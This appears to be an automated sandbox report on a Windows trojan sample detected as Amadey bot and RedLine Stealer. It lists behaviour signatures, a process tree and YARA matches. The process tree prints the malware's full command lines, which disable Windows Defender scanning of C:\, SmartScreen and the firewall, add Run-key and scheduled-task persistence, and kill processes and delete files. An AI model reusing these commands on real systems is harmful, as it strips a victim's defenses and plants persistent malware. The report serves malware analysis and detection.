Loading ...

Play interactive tourEdit tour

Windows Analysis Report We7WnoqeXe

Overview

General Information

Sample Name:We7WnoqeXe (renamed file extension from none to exe)
Analysis ID:519882
MD5:382d9703b3918169ddc982d766509aec
SHA1:e04f97d805ac8e194923313f1ac7a945c8aea22c
SHA256:dfb04cffc12e51649a779ad6790f45bca391b0191a1842f3f3b53e68b30b87d5
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Amadey RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Creates files in the system32 config directory
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Sigma detected: Suspicius Add Task From User AppData Temp
Sigma detected: Powershell Defender Exclusion
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the windows firewall
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Too many similar processes found
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Sigma detected: Direct Autorun Keys Modification
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Enables security privileges
Uses taskkill to terminate processes
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • We7WnoqeXe.exe (PID: 2548 cmdline: "C:\Users\user\Desktop\We7WnoqeXe.exe" MD5: 382D9703B3918169DDC982D766509AEC)
    • vms.exe (PID: 3492 cmdline: "C:\Users\user\AppData\Local\Temp\vms.exe" MD5: 2BC350586FBDE00FFF7707D69C30941F)
      • rnyuf.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" MD5: 2BC350586FBDE00FFF7707D69C30941F)
        • cmd.exe (PID: 372 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 5256 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 5964 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vms.exe (PID: 5920 cmdline: "C:\Users\user\AppData\Local\Temp\vms\vms.exe" MD5: 34CCA2013EB9B2941A65971919BF356D)
    • slhost.exe (PID: 6340 cmdline: "C:\Users\user\AppData\Local\Temp\slhost.exe" MD5: 7663A0F9957107E7EF91C493A3C85261)
      • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit) MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • UpSys.exe (PID: 1112 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
          • UpSys.exe (PID: 6856 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
            • UpSys.exe (PID: 5452 cmdline: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
              • powershell.exe (PID: 1056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 95000560239032BC68B4C2FDFCDEF913)
                • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • netsh.exe (PID: 6012 cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32)
      • cmd.exe (PID: 5496 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5656 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
          • conhost.exe (PID: 3076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5764 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 5672 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 4188 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 5912 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3596 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6332 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 4968 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 5156 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1844 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 6156 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 7032 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 596 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
          • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7144 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6864 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3216 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 1256 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 3536 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1972 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 3584 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 5668 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 4304 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 3756 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5988 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1280 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 2260 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 2880 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6760 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5112 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
          • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5536 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 1624 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3272 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5656 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • cmd.exe (PID: 2496 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6252 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5932 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 6300 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 4648 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • cmd.exe (PID: 596 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • cmd.exe (PID: 5112 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • cmd.exe (PID: 7108 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1748 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • System.exe (PID: 4736 cmdline: "C:\ProgramData\MicrosoftNetwork\System.exe" MD5: 7663A0F9957107E7EF91C493A3C85261)
    • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UpSys.exe (PID: 6036 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
        • UpSys.exe (PID: 1500 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
          • UpSys.exe (PID: 4436 cmdline: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
      • netsh.exe (PID: 2188 cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32)
    • cmd.exe (PID: 5664 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 5196 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 6008 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rnyuf.exe (PID: 4684 cmdline: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe MD5: 2BC350586FBDE00FFF7707D69C30941F)
  • vms.exe (PID: 6776 cmdline: "C:\Users\user\AppData\Local\Temp\vms\vms.exe" MD5: 34CCA2013EB9B2941A65971919BF356D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\wchuwmlMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
    • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
    • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    C:\Windows\Temp\qmpezjmMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
    • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
    • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    C:\Windows\Temp\dhfqtabMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
    • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
    • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    C:\Users\user\AppData\Local\Temp\jonmpklMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
    • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
    • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    C:\Windows\Temp\zldwyypMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
    • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
    • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
    • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E

    Memory Dumps

